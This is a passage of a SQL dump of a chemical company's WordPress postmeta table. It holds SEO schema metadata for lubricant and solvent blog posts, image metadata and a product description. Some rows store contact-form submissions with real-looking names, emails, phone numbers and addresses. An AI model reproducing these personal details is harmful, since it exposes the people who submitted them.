with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:12:"Chris Pavlik";s:3:"url";s:59:"https://www.miller-stephenson.com/author/cpavlikmschem-com/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44881, 3760, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:65:"https://www.miller-stephenson.com/power-pfpe-lubricant-selection/";}s:3:"url";s:65:"https://www.miller-stephenson.com/power-pfpe-lubricant-selection/";s:8:"headline";s:37:"The Power of PFPE Lubricant Selection";s:13:"datePublished";s:25:"2017-02-28T19:16:31+00:00";s:12:"dateModified";s:25:"2017-03-01T13:44:09+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-PFPE-Lubricant.jpg";s:5:"width";i:1000;s:6:"height";i:667;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:311:"How Manufacturers Have Reduced Downtime and Costs | PFPE Lubricant | Krytox From equipment selection to maintenance cycles and troubleshooting, we know you work tirelessly to achieve peak plant performance every day. With the average plant using more than 2,000 bearings – in addition to the valves, seals and";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44883, 1205, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44885, 953, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44886, 953, '_schema_json_timestamp', '1503306047'); 
INSERT INTO `wp_postmeta` VALUES (44888, 809, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44889, 809, '_schema_json_timestamp', '1503306650'); 
INSERT INTO `wp_postmeta` VALUES (44890, 968, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44891, 1228, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44892, 1228, '_schema_json_timestamp', '1503307224'); 
INSERT INTO `wp_postmeta` VALUES (44893, 1681, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44894, 4868, '_form_id', '18'); 
INSERT INTO `wp_postmeta` VALUES (44895, 4868, '_seq_num', '2'); 
INSERT INTO `wp_postmeta` VALUES (44896, 4868, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (44897, 4868, '_field_33', 'ERIC'); 
INSERT INTO `wp_postmeta` VALUES (44898, 4868, '_field_34', 'GOH'); 
INSERT INTO `wp_postmeta` VALUES (44899, 4868, '_field_35', 'UV LIGHT TECHNOLOGY SDN BHD'); 
INSERT INTO `wp_postmeta` VALUES (44900, 4868, '_field_36', 'AEROSPACE'); 
INSERT INTO `wp_postmeta` VALUES (44901, 4868, '_field_45', 'USD1300000.00'); 
INSERT INTO `wp_postmeta` VALUES (44902, 4868, '_field_46', '4'); 
INSERT INTO `wp_postmeta` VALUES (44903, 4868, '_field_49', '4'); 
INSERT INTO `wp_postmeta` VALUES (44904, 4868, '_field_47', 'www.uvlt.com.my'); 
INSERT INTO `wp_postmeta` VALUES (44905, 4868, '_field_48', 'CURRENTLY DISTRIBUTOR FOR DYMAX, SPECIALIZED IN UV ADHESIVE, UV CURING EQUIPMENTS AND DISTRIBUTOR FOR VISCOTEC DISPENSING SYSTEM IN MALAYSIA.'); 
INSERT INTO `wp_postmeta` VALUES (44906, 4868, '_field_37', 'hm@uvlt.com.my'); 
INSERT INTO `wp_postmeta` VALUES (44907, 4868, '_field_38', '(019) 449-2682'); 
INSERT INTO `wp_postmeta` VALUES (44908, 4868, '_field_39', '31-8-33A THE CEO BUILDING, LEBUH NIPAH 5, 11950 BAYAN LEPAS, PENANG, MALAYSIA.'); 
INSERT INTO `wp_postmeta` VALUES (44909, 4868, '_field_44', 'a:3:{i:0;s:25:"Krytox Aerospace Products";i:1;s:26:"Krytox Automotive Products";i:2;s:32:"Other Miller-Stephenson Products";}'); 
INSERT INTO `wp_postmeta` VALUES (44910, 4868, '_field_43', ''); 
INSERT INTO `wp_postmeta` VALUES (44911, 4868, '_sub_id', '4868'); 
INSERT INTO `wp_postmeta` VALUES (44912, 675, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44913, 1019, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44914, 1230, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44915, 1270, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44916, 580, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44917, 1106, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44918, 1712, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44919, 1370, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44920, 1370, '_schema_json_timestamp', '1503310963'); 
INSERT INTO `wp_postmeta` VALUES (44921, 960, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44922, 2493, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44923, 190, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44924, 623, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44925, 646, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44926, 1344, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44927, 4508, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44928, 4508, '_schema_json_timestamp', '1503314673'); 
INSERT INTO `wp_postmeta` VALUES (44930, 1011, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44931, 4090, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44933, 783, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44936, 1673, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44938, 647, '_schema_json_timestamp', '1503409918'); 
INSERT INTO `wp_postmeta` VALUES (44939, 823, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44940, 1724, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44944, 4870, '_form_id', '18'); 
INSERT INTO `wp_postmeta` VALUES (44945, 4870, '_seq_num', '3'); 
INSERT INTO `wp_postmeta` VALUES (44946, 4870, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (44947, 4870, '_field_33', 'Zayyan'); 
INSERT INTO `wp_postmeta` VALUES (44948, 4870, '_field_34', 'Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (44949, 4870, '_field_35', 'Miller-Stephenson Chemical Co.'); 
INSERT INTO `wp_postmeta` VALUES (44950, 4870, '_field_36', 'asd'); 
INSERT INTO `wp_postmeta` VALUES (44951, 4870, '_field_45', 'asd'); 
INSERT INTO `wp_postmeta` VALUES (44952, 4870, '_field_46', 'asd'); 
INSERT INTO `wp_postmeta` VALUES (44953, 4870, '_field_49', 'asd'); 
INSERT INTO `wp_postmeta` VALUES (44954, 4870, '_field_47', 'asd'); 
INSERT INTO `wp_postmeta` VALUES (44955, 4870, '_field_48', 'asd'); 
INSERT INTO `wp_postmeta` VALUES (44956, 4870, '_field_37', 'zchowdhury@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (44957, 4870, '_field_38', '(121) 312-3123'); 
INSERT INTO `wp_postmeta` VALUES (44958, 4870, '_field_39', '55 Backus Ave'); 
INSERT INTO `wp_postmeta` VALUES (44959, 4870, '_field_44', 'a:1:{i:0;s:19:"Krytox GPL Products";}'); 
INSERT INTO `wp_postmeta` VALUES (44960, 4870, '_field_43', ''); 
INSERT INTO `wp_postmeta` VALUES (44961, 4870, '_sub_id', '4870'); 
INSERT INTO `wp_postmeta` VALUES (44962, 4868, '_edit_lock', '1503321289:2'); 
INSERT INTO `wp_postmeta` VALUES (44963, 1931, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44964, 1931, '_schema_json_timestamp', '1503321370'); 
INSERT INTO `wp_postmeta` VALUES (44965, 1268, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44966, 363, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44967, 1851, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44968, 1148, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44969, 638, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44970, 1706, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44971, 1460, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44972, 1460, '_schema_json_timestamp', '1503324333'); 
INSERT INTO `wp_postmeta` VALUES (44973, 3744, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:66:"https://www.miller-stephenson.com/comparing-industrial-lubricants/";}s:3:"url";s:66:"https://www.miller-stephenson.com/comparing-industrial-lubricants/";s:8:"headline";s:57:"Industrial Lubricants That Can Reduce Production Downtime";s:13:"datePublished";s:25:"2017-02-28T16:14:48+00:00";s:12:"dateModified";s:25:"2017-03-01T13:45:28+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2017/02/Industrial-Lubricants.jpg";s:5:"width";i:1000;s:6:"height";i:417;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:339:"Comparing Industrial Lubricants - Downsides of Hydrocarbons Petroleum-Based and Synthetic Hydrocarbon Lubricants vs. Krytox (PFPEs) While industrial lubricants only make up 1% of plant operational costs, the lack of proper lubrication or application can have an adverse impact on total maintenance costs and downtime. More than half of the";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44974, 1801, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44975, 1435, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44976, 1031, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44977, 3319, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44978, 3319, '_schema_json_timestamp', '1503326560'); 
INSERT INTO `wp_postmeta` VALUES (44979, 2507, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:58:"https://www.miller-stephenson.com/krytox-prepare-bearings/";}s:3:"url";s:58:"https://www.miller-stephenson.com/krytox-prepare-bearings/";s:8:"headline";s:49:"How to Prepare Bearings with Krytox™ Lubricants";s:13:"datePublished";s:25:"2016-10-12T13:52:44+00:00";s:12:"dateModified";s:25:"2016-10-12T19:30:43+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_355004969.jpg";s:5:"width";i:4985;s:6:"height";i:3324;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:24:"Krytox, Prepare Bearings";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:324:"How to prepare a bearing with Krytox™ Lubricants Before You Start Dirt is one of a bearing’s worst enemies. That’s why it is so important to work in a clean area, with bearings and lubricants covered until ready for use. When handling bearings, wear clean elastomer gloves and use clean, lint-free rags. Compressed";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44981, 948, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44982, 2782, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44983, 1001, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44984, 1722, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44985, 1113, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:64:"https://www.miller-stephenson.com/krytox-tm7-tire-mold-industry/";}s:3:"url";s:64:"https://www.miller-stephenson.com/krytox-tm7-tire-mold-industry/";s:8:"headline";s:33:"Krytox TM7 For Tire Mold Industry";s:13:"datePublished";s:25:"2016-08-31T15:10:38+00:00";s:12:"dateModified";s:25:"2016-10-07T13:52:08+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:82:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-tm7-grease.jpg";s:5:"width";i:5760;s:6:"height";i:3840;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:22:"Krytox, Tire Mold, TM7";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:361:"Krytox TM7 Tire Mold Industry Lubricant An American tire manufacturer increases production and saves on costly mold repair by switching lubricants. U.S. tire manufacturer improves bottom line with new lubricant A major tire manufacturer located in the United States was experiencing significant, recurring problems with galling—roughening, wearing, or warping";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44986, 1352, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44987, 1352, '_schema_json_timestamp', '1503330332'); 
INSERT INTO `wp_postmeta` VALUES (44988, 1834, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44989, 944, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44990, 1042, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44991, 1198, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44992, 696, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44993, 1670, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44994, 568, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44995, 33, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44996, 33, '_schema_json_timestamp', '1503332477'); 
INSERT INTO `wp_postmeta` VALUES (44997, 442, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44998, 943, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44999, 310, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45000, 3324, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45001, 3324, '_schema_json_timestamp', '1503337144'); 
INSERT INTO `wp_postmeta` VALUES (45002, 1679, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45003, 831, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45004, 1793, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45005, 1793, '_schema_json_timestamp', '1503337974'); 
INSERT INTO `wp_postmeta` VALUES (45006, 468, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45007, 1720, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45008, 871, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45009, 4872, '_wp_attached_file', '2016/08/shutterstock_425883247.jpg'); 
INSERT INTO `wp_postmeta` VALUES (45010, 4872, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:753;s:4:"file";s:34:"2016/08/shutterstock_425883247.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_425883247-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_425883247-800x602.jpg";s:5:"width";i:800;s:6:"height";i:602;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_425883247-768x578.jpg";s:5:"width";i:768;s:6:"height";i:578;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_425883247-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_425883247-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_425883247-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_425883247-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (45011, 973, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (45012, 973, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (45013, 973, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (45014, 973, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (45015, 973, '_ywtm_content_tab_description', 'Krytox FPG 182 has exceptional performance as shown by its bearing life test that has over 7 times the life of similar products. It is a perfluoropolyether (PFPE)-based grease thickened with a special high performance PTFE thickener, and has exceptional chemical and oxygen resistance. It is designed to operate under severe conditions, and can be used for bearings, gears, and as a lubricant for O-rings and elastomers.\r\n\r\n<strong>Storage and Handling</strong>\r\nShelf life: Indefinite shelf life in unopened container. It is normal for oil to separate from grease during storage. Before use, knead tubes or stir larger containers to remix.\r\n\r\n<strong>Product Package</strong>\r\nKrytox FPG 182 is available in 50 and 100 g syringes, 8 oz tubes, and 1.76 lb cartridges.'); 
INSERT INTO `wp_postmeta` VALUES (45016, 973, '_yoast_wpseo_linkdex', '76'); 
INSERT INTO `wp_postmeta` VALUES (45017, 919, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45018, 1154, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45019, 973, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45020, 973, '_schema_json_timestamp', '1503388866'); 
INSERT INTO `wp_postmeta` VALUES (45021, 308, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45022, 1713, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45023, 4795, '_edit_lock', '1503339890:2'); 
INSERT INTO `wp_postmeta` VALUES (45024, 4873, '_form_id', '18'); 
INSERT INTO `wp_postmeta` VALUES (45025, 4873, '_seq_num', '4'); 
INSERT INTO `wp_postmeta` VALUES (45026, 4873, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (45027, 4873, '_field_33', 'SDFSdfS'); 
INSERT INTO `wp_postmeta` VALUES (45028, 4873, '_field_34', 'sdfASDFSdf'); 
INSERT INTO `wp_postmeta` VALUES (45029, 4873, '_field_35', 'SDFSDFsdfsF'); 
INSERT INTO `wp_postmeta` VALUES (45030, 4873, '_field_36', 'SdfSDFsdfSD'); 
INSERT INTO `wp_postmeta` VALUES (45031, 4873, '_field_45', '$1.00 A YR'); 
INSERT INTO `wp_postmeta` VALUES (45032, 4873, '_field_46', '0'); 
INSERT INTO `wp_postmeta` VALUES (45033, 4873, '_field_49', '0'); 
INSERT INTO `wp_postmeta` VALUES (45034, 4873, '_field_47', 'xdVGgvg'); 
INSERT INTO `wp_postmeta` VALUES (45035, 4873, '_field_48', 'ZXFGVBdfgB'); 
INSERT INTO `wp_postmeta` VALUES (45036, 4873, '_field_37', 'wmarotta@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (45037, 4873, '_field_38', '(203) 743-4447'); 
INSERT INTO `wp_postmeta` VALUES (45038, 4873, '_field_39', '55 Backus Avenue'); 
INSERT INTO `wp_postmeta` VALUES (45039, 4873, '_field_44', 'a:1:{i:0;s:19:"Krytox GPL Products";}'); 
INSERT INTO `wp_postmeta` VALUES (45040, 4873, '_field_43', ''); 
INSERT INTO `wp_postmeta` VALUES (45041, 4873, '_sub_id', '4873'); 
INSERT INTO `wp_postmeta` VALUES (45042, 1121, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:49:"https://www.miller-stephenson.com/vertrel-fluids/";}s:3:"url";s:49:"https://www.miller-stephenson.com/vertrel-fluids/";s:8:"headline";s:98:"Why Vertrel specialty fluids are a suitable replacement for N-propyl bromide and Trichloroethylene";s:13:"datePublished";s:25:"2016-08-31T15:55:30+00:00";s:12:"dateModified";s:25:"2016-10-14T19:11:56+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-surfactant-1-oil-fsh.jpg";s:5:"width";i:5616;s:6:"height";i:3744;}s:14:"articleSection";s:35:"Opteon™ &amp; Vertrel™ Articles";s:8:"keywords";s:25:"npB, replacement, Vertrel";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:397:"Why are Vertrel fluids a suitable replacement for nPB? Recently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf The report concluded that there was “clear evidence of carcinogenic activity” in female mice";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45043, 1668, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45044, 994, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45045, 714, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45046, 1271, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45047, 422, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45048, 422, '_schema_json_timestamp', '1503343229'); 
INSERT INTO `wp_postmeta` VALUES (45049, 2769, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45050, 20, '_schema_json', 'a:10:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:7:"Article";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:39:"https://www.miller-stephenson.com/cart/";}s:3:"url";s:39:"https://www.miller-stephenson.com/cart/";s:8:"headline";s:4:"Cart";s:13:"datePublished";s:25:"2016-08-15T19:19:44+00:00";s:12:"dateModified";s:25:"2016-08-15T19:19:44+00:00";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:18:"[woocommerce_cart]";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:20:"ddillulio@mschem.com";s:3:"url";s:61:"https://www.miller-stephenson.com/author/ddilluliomschem-com/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45051, 20, '_schema_json_timestamp', '1503344527'); 
INSERT INTO `wp_postmeta` VALUES (45052, 1183, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45053, 4874, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (45054, 4874, '_seq_num', '909'); 
INSERT INTO `wp_postmeta` VALUES (45055, 4874, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (45056, 4874, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (45057, 4874, '_field_1', 'Parth Patel'); 
INSERT INTO `wp_postmeta` VALUES (45058, 4874, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (45059, 4874, '_field_2', 'ppatel@draper.com'); 
INSERT INTO `wp_postmeta` VALUES (45060, 4874, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (45061, 4874, '_field_3', 'Hi,\r\n\r\nWe have a PTFE release agent from here. What is the recommended procedure to coat a surface with PTFE and the cure temp/time?'); 
INSERT INTO `wp_postmeta` VALUES (45062, 4874, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (45063, 4874, '_sub_id', '4874'); 
INSERT INTO `wp_postmeta` VALUES (45064, 2312, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45065, 305, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45066, 3152, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:60:"https://www.miller-stephenson.com/krytox-xht-bdz-case-study/";}s:3:"url";s:60:"https://www.miller-stephenson.com/krytox-xht-bdz-case-study/";s:8:"headline";s:25:"Krytox XHT-BDZ Case Study";s:13:"datePublished";s:25:"2016-11-29T13:37:15+00:00";s:12:"dateModified";s:25:"2016-11-29T13:39:39+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_523282177.jpg";s:5:"width";i:1000;s:6:"height";i:662;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:344:"Krytox XHT-BDZ Case Study Krytox XHT-BDZ Steam Turbine Governor Control Valve Application An American electricity generating company reduces downtime and helps improve the bottom line by switching greases. Major U.S. Supplier to the Electric Grid Improves Performance and Saves Money A major electricity generation company located in the United";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
